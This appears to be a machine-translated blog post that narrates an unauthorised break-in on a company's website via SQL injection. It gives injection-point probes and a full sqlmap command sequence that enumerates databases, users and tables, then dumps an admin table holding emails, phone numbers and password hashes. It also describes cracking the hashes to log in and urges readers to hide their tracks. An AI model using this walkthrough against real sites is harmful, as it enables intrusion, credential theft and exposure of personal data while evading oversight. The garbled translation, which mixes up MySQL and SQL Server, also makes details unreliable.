SQL Injection-how do I break through an Internet company step by step

SQL Injection-how do I break through an Internet company step by step

Recently, I have been studying Web security-related knowledge, especially SQL injection. Some tools related to SQL injection are introduced. I am bored at home on weekends. I want to combine the things I have learned at ordinary times to attack a company with a friend around me to see if I can succeed. I don't know if I don't try it. I'm so excited. I wrote a blog article here to record how I broke this internet company step by step.

[About crime tools]

(1) AppScan penetration scanning tool

Appscan is one of the most widely used tools on the Web application penetration testing stage. It is a desktop application that helps professional security personnel perform automated Web application vulnerability assessment.

(2) Sqlmap penetration testing tool

Sqlmap is an automated SQL injection tool. Its main function is to scan and discover and exploit the SQL injection vulnerability of a given URL.

[Details]

First, use the Appscan tool to scan the official website of www.xxx.com. The scan results are as follows:

Among the 56 security questions, find the link you are interested in, for example, the following:

Http://www.xxx.com/system/cms/show? Id = 1

Why should we pick this one out? Because it is typical for SQL injection, the following common methods of SQL injection are widely used. First, use the following statement to determine whether the website has an injection point:

Http: // 192.168.16.128/news. php? Id = 1 original website

Http: // 192.168.16.128/news. php? Id = 1' error or abnormal display

Http: // 192.168.16.128/news. php? Id = 1 and 1 = 1 error or abnormal display

Http: // 192.168.16.128/news. php? Id = 1 and 1 = 2 error or abnormal display

If an error occurs, the injection point exists.

After judging the http://www.xxx.com/system/cms/show? Id = 1 after the link has an injection point, start our penetration test tool Sqlmap to perform the next injection. The detailed process is as follows:

1) confirm whether the target injection point is available again:

Python sqlmap. py-u http://www.xxx.com/system/cms/show? Id = 1

Parameters:

-U: Specifies the url of the injection point.

Result:

Injection result display:

A. the parameter id has a Boolean-based blind injection, that is, the true and false injection conditions can be determined based on the returned page.

B. the parameter id is time-based blind injection, that is, no information can be determined based on the Content returned on the page, and the conditional statement is used to check whether the time delay statement is executed (that is, whether the page return time is increased.

C. Database Type: MySql 5.0.12

2) All databases in the violent database:

A command can expose the names of all databases in sqlserver. The command is as follows:

Python sqlmap. py-u http://www.xxx.com/system/cms/show? Id = 1-dbs

Parameters:

-Dbs: dbs are preceded by two bars to list all databases.

Result:

The result shows that sqlserver contains three available databases.

3) obtain the currently used database

Python sqlmap. py-u http://www.xxx.com/system/cms/show? Id = 1-current-db

Parameters:

-Current-db: the database currently in use.

Result:

4) obtain the account used by the current database

Python sqlmap. py-u http://www.xxx.com/system/cms/show? Id = 1-current-user

5) list all SQL Server users

Python sqlmap. py-u http://www.xxx.com/system/cms/show? Id = 1-users

 

6) obtain the database account and password of the current user

Python sqlmap. py-u http://www.xxx.com/system/cms/show? Id = 1-passwords

The result shows that the user may not have the permission to read the relevant system.

7) List tables in the database

Python sqlmap. py-u http://www.xxx.com/system/cms/show? Id = 1-D xxx_store-tables

Parameters:

-D: Specifies the database name.

-Tables: Lists tables.

Result:

The results show that 69 tables are listed.

8) list fields in the table

Python sqlmap. py-u http://www.xxx.com/system/cms/show? Id = 1-D xxx_store-T mall_admin-columns

Parameters:

-D: Specifies the database name.

-T: Specifies the table to list fields.

-Columns: Specifies the list fields.

Result:

9) content of violent Fields

Python sqlmap. py-u http://www.xxx.com/system/cms/show? Id = 1-D xxx_store-T mall_admin-C "ag_id, email, id, mobile, name, password, status"-dump

Parameters:

-C: Specifies the field to be violent

-Dump: export the result

If the field contains too many contents, it takes a lot of time. You can specify the field content to be exported in a specific range. The command is as follows:

Python sqlmap. py-u http://www.xxx.com/system/cms/show? Id = 1-D xxx_store-T mall_admin-C "ag_id, email, id, mobile, name, password, status"-start 1-stop 10-dump

Parameters:

-Start: Specifies the start row.

-Stop: Specifies the end row.

The meaning of this command is: export the data in rows 1st to 10th of fields (ag_id, email, id, mobile, name, password, status) in the table mall_admin in the database xxx_store.

The result is as follows:

We can see the user information in the admin table. The password field is decrypted using md5 to obtain the original hash password. By using the username and password, we can log on to the website.

So far, we have successfully intruded into the background of a company and obtained relevant data. However, we would like to remind you that successful intrusion is only half successful, and the most important half is to clean your ass so that no one else can discover you!